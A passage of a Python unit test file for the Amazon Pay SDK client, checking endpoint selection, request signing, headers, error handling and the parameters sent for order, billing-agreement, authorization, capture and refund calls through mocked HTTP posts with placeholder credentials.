self.client._set_endpoint()\n self.assertEqual(\n self.client._mws_endpoint,\n 'https://mws.amazonservices.com/OffAmazonPayments_Sandbox/2013-01-01')\n\n def test_sign(self):\n test_signature = self.request._sign('my_test_string')\n self.assertEqual(\n test_signature,\n 'JQZYxe8EFlLE3XCAWotsn329rpZF7OFYhA8oo7rUV2E=')\n\n def test_application_settings(self):\n client = AmazonPayClient(\n mws_access_key=self.mws_access_key,\n mws_secret_key=self.mws_secret_key,\n merchant_id=self.merchant_id,\n handle_throttle=False,\n sandbox=True,\n region='na',\n currency_code='USD',\n application_name='test_application',\n application_version='test_application_version')\n self.assertEqual(client.application_name, 'test_application')\n self.assertEqual(\n client.application_version,\n 'test_application_version')\n\n def test_properties(self):\n self.assertEqual(self.client.mws_access_key, 'mws_access_key')\n self.assertEqual(self.client.mws_secret_key, 'mws_secret_key')\n self.assertEqual(self.client.merchant_id, 'merchant_id')\n self.assertEqual(self.client._region_code, 'na')\n self.assertEqual(self.client.currency_code, 'USD')\n self.assertEqual(self.client.handle_throttle, False)\n self.assertEqual(self.client.sandbox, True)\n\n @patch('requests.post')\n def test_generic_error_response(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_generic_error_post\n self.request.send_post()\n response = self.request.response\n self.assertEqual(type(response), PaymentErrorResponse)\n\n @patch('requests.post')\n def test_500_response(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_500_post\n self.request.send_post()\n response = self.request.response.to_dict()\n self.assertEqual(response['error'], '500')\n\n @patch('requests.post')\n def test_503_response(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_503_post\n self.request.send_post()\n response = self.request.response.to_dict()\n self.assertEqual(response['error'], '503')\n\n @patch('requests.post')\n def test_headers(self, mock_urlopen):\n py_version = \".\".join(map(str, sys.version_info[:3]))\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_service_status()\n py_valid = False\n if sys.version_info[0] == 3 and sys.version_info[1] >= 2:\n py_valid = True\n \n header_expected = {\n 'Content-Type': 'application/x-www-form-urlencoded',\n \"User-Agent\":'amazon-pay-sdk-python/{0} ({1}Python/{2}; {3}/{4})'.format(\n str(ap_version.versions['application_version']),\n (''),\n py_version,\n str(platform.system()),\n str(platform.release())\n )\n }\n self.assertEqual(mock_urlopen.call_args[1]['headers'], header_expected)\n self.assertTrue(py_valid, True)\n\n @patch('requests.post')\n def test_get_merchant_account_status(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_merchant_account_status(\n merchant_id='A2AMGDUDUJFL',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b46293482379')\n parameters = {\n 'Action': 'GetMerchantAccountStatus',\n 'SellerId': 'A2AMGDUDUJFL',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b46293482379'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_create_order_reference_for_id(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.create_order_reference_for_id(\n object_id='B01-462347-4762387',\n object_id_type='BillingAgreement',\n order_total='1',\n inherit_shipping_address=False,\n confirm_now=True,\n 
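# The optional order attributes below are all passed through to exercise the full parameter mapping.\n 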
platform_id='testPlatformId123',\n seller_note='testSellerNote2145',\n seller_order_id='testSellerOrderId21434',\n supplementary_data=self.supplementary_data,\n store_name='testStoreName1234',\n custom_information='testCustomInfo12435',\n merchant_id='A2AMR0DUGHIUEHQ',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06476237468923749823')\n parameters = {\n 'Action': 'CreateOrderReferenceForId',\n 'Id': 'B01-462347-4762387',\n 'IdType': 'BillingAgreement',\n 'OrderReferenceAttributes.OrderTotal.Amount': '1',\n 'OrderReferenceAttributes.OrderTotal.CurrencyCode': 'USD',\n 'InheritShippingAddress': 'false',\n 'ConfirmNow': 'true',\n 'OrderReferenceAttributes.PlatformId': 'testPlatformId123',\n 'OrderReferenceAttributes.SellerNote': 'testSellerNote2145',\n 'OrderReferenceAttributes.SellerOrderAttributes.SellerOrderId': 'testSellerOrderId21434',\n 'OrderReferenceAttributes.SupplementaryData': self.supplementary_data,\n 'OrderReferenceAttributes.SellerOrderAttributes.StoreName': 'testStoreName1234',\n 'OrderReferenceAttributes.SellerOrderAttributes.CustomInformation': 'testCustomInfo12435',\n 'SellerId': 'A2AMR0DUGHIUEHQ',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06476237468923749823'}\n\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_billing_agreement_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_billing_agreement_details(\n amazon_billing_agreement_id='B01-47236478-46253862',\n address_consent_token='AFYDFWIGHUIP',\n merchant_id='ADEIUYIOQUIOW',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-7462348237498')\n parameters = {\n 'Action': 'GetBillingAgreementDetails',\n 'AmazonBillingAgreementId': 'B01-47236478-46253862',\n 'AddressConsentToken': 'AFYDFWIGHUIP',\n 'SellerId': 'ADEIUYIOQUIOW',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-7462348237498'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_set_billing_agreement_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.set_billing_agreement_details(\n amazon_billing_agreement_id='B01-47236478-462863428',\n platform_id='testPlatformId89',\n seller_note='testSellerNote3251',\n seller_billing_agreement_id='testBillingAgreement1213',\n store_name='testStoreName5237',\n custom_information='testCustomInfo32365',\n merchant_id='AGDUIEJOQEOPQWIKO',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc12-4623862')\n parameters = {\n 'Action': 'SetBillingAgreementDetails',\n 'AmazonBillingAgreementId': 'B01-47236478-462863428',\n 'BillingAgreementAttributes.PlatformId': 'testPlatformId89',\n 'BillingAgreementAttributes.SellerNote': 'testSellerNote3251',\n 'BillingAgreementAttributes.SellerBillingAgreementAttributes.SellerBillingAgreementId': 'testBillingAgreement1213',\n 'BillingAgreementAttributes.SellerBillingAgreementAttributes.StoreName': 'testStoreName5237',\n 'BillingAgreementAttributes.SellerBillingAgreementAttributes.CustomInformation': 'testCustomInfo32365',\n 'SellerId': 'AGDUIEJOQEOPQWIKO',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc12-4623862'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_confirm_billing_agreement(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n 
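# Same pattern as the tests above: stub requests.post, invoke the client call, then compare the encoded payload.\n 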
self.client.confirm_billing_agreement(\n amazon_billing_agreement_id='B01-47236478-46284638789',\n merchant_id='AGFUHWIEJLMLK',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc12-4263289')\n parameters = {\n 'Action': 'ConfirmBillingAgreement',\n 'AmazonBillingAgreementId': 'B01-47236478-46284638789',\n 'SellerId': 'AGFUHWIEJLMLK',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc12-4263289'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_validate_billing_agreement(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.validate_billing_agreement(\n amazon_billing_agreement_id='B01-47236478-46287462347823490',\n merchant_id='AGFUHWHYDIIJQWL',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc12-457267342897')\n parameters = {\n 'Action': 'ValidateBillingAgreement',\n 'AmazonBillingAgreementId': 'B01-47236478-46287462347823490',\n 'SellerId': 'AGFUHWHYDIIJQWL',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc12-457267342897'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_authorize_on_billing_agreement(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.authorize_on_billing_agreement(\n amazon_billing_agreement_id='B01-4653268-47632947',\n authorization_reference_id='testAuthRefId31253',\n authorization_amount='1',\n seller_authorization_note='testSellerAuthNote3612367',\n transaction_timeout=0,\n capture_now=True,\n soft_descriptor='testSoftDescriptor42837',\n seller_note='testSellerNote4721893',\n platform_id='testPlatformId47237',\n seller_order_id='testSellerOrderId4237',\n store_name='testStoreName842398',\n custom_information='testCustomInfo623',\n supplementary_data=self.supplementary_data,\n inherit_shipping_address=False,\n merchant_id='A2AMR0FDYHGHJD',\n mws_auth_token='amzn.mws.d6ac8f2d-463286-fhegsdj46238')\n parameters = {\n 'Action': 'AuthorizeOnBillingAgreement',\n 'AmazonBillingAgreementId': 'B01-4653268-47632947',\n 'TransactionTimeout': '0',\n 'AuthorizationReferenceId': 'testAuthRefId31253',\n 'AuthorizationAmount.Amount': '1',\n 'AuthorizationAmount.CurrencyCode': 'USD',\n 'CaptureNow': 'true',\n 'SellerAuthorizationNote': 'testSellerAuthNote3612367',\n 'SoftDescriptor': 'testSoftDescriptor42837',\n 'SellerNote': 'testSellerNote4721893',\n 'PlatformId': 'testPlatformId47237',\n 'InheritShippingAddress': 'false',\n 'SellerOrderAttributes.SellerOrderId': 'testSellerOrderId4237',\n 'SellerOrderAttributes.StoreName': 'testStoreName842398',\n 'SellerOrderAttributes.CustomInformation': 'testCustomInfo623',\n 'SellerOrderAttributes.SupplementaryData': self.supplementary_data,\n 'SellerId': 'A2AMR0FDYHGHJD',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-463286-fhegsdj46238'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_close_billing_agreement(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.close_billing_agreement(\n amazon_billing_agreement_id='B01-4236278-3761372',\n closure_reason='testClosureReason',\n merchant_id='A2AMR0DGUQHWIJQWL',\n mws_auth_token='amzn.mws.d6ac8f2d-463286-fhegsdj46238')\n parameters = {\n 'Action': 'CloseBillingAgreement',\n 'AmazonBillingAgreementId': 'B01-4236278-3761372',\n 'ClosureReason': 
'testClosureReason',\n 'SellerId': 'A2AMR0DGUQHWIJQWL',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-463286-fhegsdj46238'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_set_order_reference_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.set_order_reference_details(\n amazon_order_reference_id='P01-1234567-7654897',\n order_total='1',\n platform_id='platformId4673',\n seller_note='sellerNote38278',\n seller_order_id='sellerOrderId123',\n store_name='testStoreName387289',\n custom_information='customInfo34278',\n merchant_id='A2AMR0CLHYUTGH',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b06a4628',\n supplementary_data=self.supplementary_data)\n parameters = {\n 'Action': 'SetOrderReferenceDetails',\n 'AmazonOrderReferenceId': 'P01-1234567-7654897',\n 'OrderReferenceAttributes.OrderTotal.Amount': '1',\n 'OrderReferenceAttributes.OrderTotal.CurrencyCode': 'USD',\n 'OrderReferenceAttributes.PlatformId': 'platformId4673',\n 'OrderReferenceAttributes.SellerNote': 'sellerNote38278',\n 'OrderReferenceAttributes.SellerOrderAttributes.SellerOrderId': 'sellerOrderId123',\n 'OrderReferenceAttributes.SellerOrderAttributes.StoreName': 'testStoreName387289',\n 'OrderReferenceAttributes.SellerOrderAttributes.CustomInformation': 'customInfo34278',\n 'SellerId': 'A2AMR0CLHYUTGH',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b06a4628',\n 'OrderReferenceAttributes.SellerOrderAttributes.SupplementaryData': self.supplementary_data}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n \n @patch('requests.post')\n def test_set_order_attributes(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.set_order_attributes(\n amazon_order_reference_id='P01-1234567-4827348237',\n currency_code='USD',\n amount='1',\n seller_order_id='testSellerOrderId5371',\n payment_service_provider_id='AGHJHHJKJHL',\n payment_service_provider_order_id='testPSPOrderId',\n platform_id='testPlatformId472',\n seller_note='testSellerNote4628',\n request_payment_authorization='true',\n store_name='testStoreName26157',\n list_order_item_categories=['test'],\n custom_information='testCustomInfo35273',\n merchant_id='AGHJHHJKJHL',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b06a4628',\n supplementary_data=self.supplementary_data)\n \n parameters = {\n 'Action': 'SetOrderAttributes',\n 'AmazonOrderReferenceId': 'P01-1234567-4827348237',\n 'OrderAttributes.OrderTotal.Amount': '1',\n 'OrderAttributes.OrderTotal.CurrencyCode': 'USD',\n 'OrderAttributes.SellerOrderAttributes.CustomInformation': 'testCustomInfo35273',\n 'OrderAttributes.SellerOrderAttributes.OrderItemCategories.OrderItemCategory.1': 'test',\n 'OrderAttributes.PaymentServiceProviderAttributes.PaymentServiceProviderId': 'AGHJHHJKJHL',\n 'OrderAttributes.PaymentServiceProviderAttributes.PaymentServiceProviderOrderId': 'testPSPOrderId',\n 'OrderAttributes.PlatformId': 'testPlatformId472',\n 'OrderAttributes.RequestPaymentAuthorization': 'true',\n 'OrderAttributes.SellerNote': 'testSellerNote4628',\n 'OrderAttributes.SellerOrderAttributes.SellerOrderId': 'testSellerOrderId5371',\n 'OrderAttributes.SellerOrderAttributes.StoreName': 'testStoreName26157',\n 'SellerId': 'AGHJHHJKJHL',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b06a4628',\n 'OrderAttributes.SellerOrderAttributes.SupplementaryData': self.supplementary_data}\n data_expected = 
self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n\n @patch('requests.post')\n def test_get_order_reference_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_order_reference_details(\n amazon_order_reference_id='P01-476238-47238',\n address_consent_token='ADUHIQILPLP',\n access_token='AHJJOKJJHNJNJK',\n merchant_id='ADGJUHJWKJKJ',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b427489234798')\n parameters = {\n 'Action': 'GetOrderReferenceDetails',\n 'AmazonOrderReferenceId': 'P01-476238-47238',\n 'AddressConsentToken': 'ADUHIQILPLP',\n 'AccessToken': 'AHJJOKJJHNJNJK',\n 'SellerId': 'ADGJUHJWKJKJ',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b427489234798'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_confirm_order_reference(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.confirm_order_reference(\n amazon_order_reference_id='P01-476238-47263849238',\n merchant_id='AHDGJHDJKFJIIIJ',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42rwe74237489',\n success_url='https://www.success.com',\n failure_url='https://www.failure.com',\n authorization_amount='5',\n currency_code='USD'\n )\n\n parameters = {\n 'Action': 'ConfirmOrderReference',\n 'AmazonOrderReferenceId': 'P01-476238-47263849238',\n 'SellerId': 'AHDGJHDJKFJIIIJ',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42rwe74237489',\n 'SuccessUrl': 'https://www.success.com',\n 'FailureUrl': 'https://www.failure.com',\n 'AuthorizationAmount.Amount': '5',\n 'AuthorizationAmount.CurrencyCode': 'USD'\n }\n \n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_confirm_order_reference_with_expect_immediate_authorization_as_true(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.confirm_order_reference(\n amazon_order_reference_id='P02-6009038-6480465',\n merchant_id='AWBW6G04XFUTG',\n expect_immediate_authorization=True)\n parameters = {\n 'Action': 'ConfirmOrderReference',\n 'AmazonOrderReferenceId': 'P02-6009038-6480465',\n 'SellerId': 'AWBW6G04XFUTG',\n 'ExpectImmediateAuthorization': 'true'}\n data_expected = self.request._querystring(parameters)\n # print(data_expected)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_confirm_order_reference_with_expect_immediate_authorization_as_false(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.confirm_order_reference(\n amazon_order_reference_id='P02-0736942-3399325',\n merchant_id='AWBW6G04XFUTG',\n expect_immediate_authorization=False)\n parameters = {\n 'Action': 'ConfirmOrderReference',\n 'AmazonOrderReferenceId': 'P02-0736942-3399325',\n 'SellerId': 'AWBW6G04XFUTG',\n 'ExpectImmediateAuthorization': 'false'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_cancel_order_reference(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.cancel_order_reference(\n amazon_order_reference_id='P01-476238-472642737489',\n cancelation_reason='testCancelReason',\n merchant_id='AJHDELWJEKELW',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42rw72372897893')\n parameters = {\n 'Action': 
'CancelOrderReference',\n 'AmazonOrderReferenceId': 'P01-476238-472642737489',\n 'CancelationReason': 'testCancelReason',\n 'SellerId': 'AJHDELWJEKELW',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42rw72372897893'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_close_order_reference(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.close_order_reference(\n amazon_order_reference_id='P01-476238-472642737489',\n closure_reason='testClosureReason24156',\n merchant_id='AJHYJHJLYFYGTUHK',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42ryurueruio3uio87')\n parameters = {\n 'Action': 'CloseOrderReference',\n 'AmazonOrderReferenceId': 'P01-476238-472642737489',\n 'ClosureReason': 'testClosureReason24156',\n 'SellerId': 'AJHYJHJLYFYGTUHK',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42ryurueruio3uio87'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_list_order_reference(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.list_order_reference(\n query_id='testSellerOrderId124',\n query_id_type='SellerOrderId',\n created_time_range_start='testStart',\n created_time_range_end='testEnd',\n sort_order='ascending',\n page_size=1,\n merchant_id='AFHRWKJEKJLJKL',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42ryurueruio3uio87',\n order_reference_status_list_filter=['test1', 'test2'])\n \n if self.client.region in ('na',):\n payment_domain = 'NA_USD'\n elif self.client.region in ('uk', 'gb'):\n payment_domain = 'EU_GBP'\n elif self.client.region in ('jp', 'fe'):\n payment_domain = 'FE_JPY' \n elif self.client.region in ('eu', 'de', 'fr', 'it', 'es', 'cy'):\n payment_domain = 'EU_EUR'\n else:\n raise ValueError(\"Error. The current region code does not match our records\")\n\n\n parameters = {\n 'Action': 'ListOrderReference',\n 'QueryId': 'testSellerOrderId124',\n 'QueryIdType': 'SellerOrderId',\n 'PaymentDomain': payment_domain,\n 'CreatedTimeRange.StartTime': 'testStart',\n 'CreatedTimeRange.EndTime': 'testEnd',\n 'SortOrder': 'ascending',\n 'PageSize': 1,\n 'SellerId': 'AFHRWKJEKJLJKL',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42ryurueruio3uio87',\n 'OrderReferenceStatusListFilter.OrderReferenceStatus.1': 'test1',\n 'OrderReferenceStatusListFilter.OrderReferenceStatus.2': 'test2'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_list_order_reference_time_check_error(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_generic_error_post\n self.client.list_order_reference(\n query_id='testSellerOrderId12444',\n query_id_type='SellerOrderId',\n created_time_range_start='testStart',\n created_time_range_end=None,\n sort_order=None,\n page_size=None,\n merchant_id='AGDJHKWJLHHK',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42r23564783492380',\n order_reference_status_list_filter=None)\n\n if self.client.region in ('na',):\n payment_domain = 'NA_USD'\n elif self.client.region in ('uk', 'gb'):\n payment_domain = 'EU_GBP'\n elif self.client.region in ('jp', 'fe'):\n payment_domain = 'FE_JPY' \n elif self.client.region in ('eu', 'de', 'fr', 'it', 'es', 'cy'):\n payment_domain = 'EU_EUR'\n else:\n raise ValueError(\"Error. 
The current region code does not match our records\")\n\n \n parameters = {\n 'Action': 'ListOrderReference',\n 'QueryId': 'testSellerOrderId12444',\n 'QueryIdType': 'SellerOrderId',\n 'PaymentDomain': payment_domain,\n 'SellerId': 'AGDJHKWJLHHK',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42r23564783492380',\n 'CreatedTimeRange.StartTime': 'testStart'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n \n @patch('requests.post')\n def test_list_order_reference_by_next_token(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.list_order_reference_by_next_token(\n next_page_token='yrtewyy4823749329482394023940',\n merchant_id='AHFUHWJELWJELEJW',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42r23436248623748')\n parameters= {\n 'Action': 'ListOrderReferenceByNextToken',\n 'NextPageToken': 'yrtewyy4823749329482394023940',\n 'SellerId': 'AHFUHWJELWJELEJW',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42r23436248623748'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n \n @patch('requests.post')\n def test_authorize(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.authorize(\n amazon_order_reference_id='P01-351-461238848937',\n authorization_reference_id='testAuthId123',\n authorization_amount='1',\n seller_authorization_note='testAuthNote123',\n transaction_timeout=0,\n capture_now=True,\n soft_descriptor='testSoftDescriptor12',\n merchant_id='A2AMR0CUYDHYIOW',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc3276378843298-fgeswyd')\n parameters = {\n 'Action': 'Authorize',\n 'AmazonOrderReferenceId': 'P01-351-461238848937',\n 'AuthorizationReferenceId': 'testAuthId123',\n 'AuthorizationAmount.Amount': '1',\n 'AuthorizationAmount.CurrencyCode': 'USD',\n 'SellerAuthorizationNote': 'testAuthNote123',\n 'TransactionTimeout': '0',\n 'CaptureNow': 'true',\n 'SoftDescriptor': 'testSoftDescriptor12',\n 'SellerId': 'A2AMR0CUYDHYIOW',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc3276378843298-fgeswyd'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_authorization_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_authorization_details(\n amazon_authorization_id='P01-351-461238848937-A42374987239849',\n merchant_id='AGDFHGWEHGWJH',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc412328378')\n parameters = {\n 'Action': 'GetAuthorizationDetails',\n 'AmazonAuthorizationId': 'P01-351-461238848937-A42374987239849',\n 'SellerId': 'AGDFHGWEHGWJH',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc412328378'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_capture(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.capture(\n amazon_authorization_id='P01-1234567-7654321-A467823648',\n capture_reference_id='testCaptureRefId123',\n capture_amount='1',\n seller_capture_note='testCaptureNote124',\n soft_descriptor='testSoftDescriptor123',\n merchant_id='A2AMR8YRGWKHK',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-472637-753648')\n parameters = {\n 'Action': 'Capture',\n 'AmazonAuthorizationId': 'P01-1234567-7654321-A467823648',\n 'CaptureReferenceId': 'testCaptureRefId123',\n 
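# CurrencyCode is not passed to capture() above; it is presumably filled in from the client's configured currency_code.\n 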
'CaptureAmount.Amount': '1',\n 'CaptureAmount.CurrencyCode': 'USD',\n 'SellerCaptureNote': 'testCaptureNote124',\n 'SoftDescriptor': 'testSoftDescriptor123',\n 'SellerId': 'A2AMR8YRGWKHK',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-472637-753648'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_capture_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_capture_details(\n amazon_capture_id='P01-4763247-C6472482379',\n merchant_id='A2AYDGTIQUYOHO',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b645234782374903')\n parameters = {\n 'Action': 'GetCaptureDetails',\n 'AmazonCaptureId': 'P01-4763247-C6472482379',\n 'SellerId': 'A2AYDGTIQUYOHO',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b645234782374903'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_close_authorization(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.close_authorization(\n amazon_authorization_id='P01-4763247-A6568472482379',\n closure_reason='testClosure',\n merchant_id='A2ATTYIUHBUMTYU',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b645234782374903')\n parameters = {\n 'Action': 'CloseAuthorization',\n 'AmazonAuthorizationId': 'P01-4763247-A6568472482379',\n 'ClosureReason': 'testClosure',\n 'SellerId': 'A2ATTYIUHBUMTYU',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b645234782374903'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_refund(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.refund(\n amazon_capture_id='P01-4763247-C645749',\n refund_reference_id='testRefundRefId125',\n refund_amount='1',\n seller_refund_note='testRefundNote123',\n soft_descriptor='testSoftDescriptor167',\n merchant_id='A2ATGUHFHWDJEOPW',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b645234782374903')\n parameters = {\n 'Action': 'Refund',\n 'AmazonCaptureId': 'P01-4763247-C645749',\n 'RefundReferenceId': 'testRefundRefId125',\n 'RefundAmount.Amount': '1',\n 'RefundAmount.CurrencyCode': 'USD',\n 'SellerRefundNote': 'testRefundNote123',\n 'SoftDescriptor': 'testSoftDescriptor167',\n 'SellerId': 'A2ATGUHFHWDJEOPW',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b645234782374903'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_refund_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_refund_details(\n amazon_refund_id='P01-4763247-R643927483',\n merchant_id='A2ATGUYIOUHIJL',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b6447623479')\n parameters = {\n 'Action': 'GetRefundDetails',\n 'AmazonRefundId': 'P01-4763247-R643927483',\n 'SellerId': 'A2ATGUYIOUHIJL',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b6447623479'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_service_status(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_service_status()\n parameters = {\n 'Action': 'GetServiceStatus'}\n data_expected = self.request._querystring(parameters)\n 
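# The expected body is built with the same _querystring helper the client uses, so this checks the parameter mapping only.\n 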
self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n def test_is_order_reference_id(self):\n self.assertTrue(self.client.is_order_reference_id('P'))\n self.assertTrue(self.client.is_order_reference_id('S'))\n self.assertFalse(self.client.is_order_reference_id('X'))\n\n def test_is_billing_agreement_id(self):\n self.assertTrue(self.client.is_billing_agreement_id('B'))\n self.assertTrue(self.client.is_billing_agreement_id('C'))\n self.assertFalse(self.client.is_billing_agreement_id('X'))\n\n def test_response_invalid_xml(self):\n with self.assertRaises(ValueError):\n PaymentResponse('<invalid></xml>')\n\n @patch('requests.post')\n def test_response_to_xml(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n response = self.client.get_service_status()\n self.assertTrue(et.fromstring(response.to_xml()))\n\n @patch('requests.post')\n def test_response_to_json(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n response = self.client.get_service_status()\n self.assertTrue(json.loads(response.to_json()))\n\n def test_response_to_json_utf8(self):\n text = 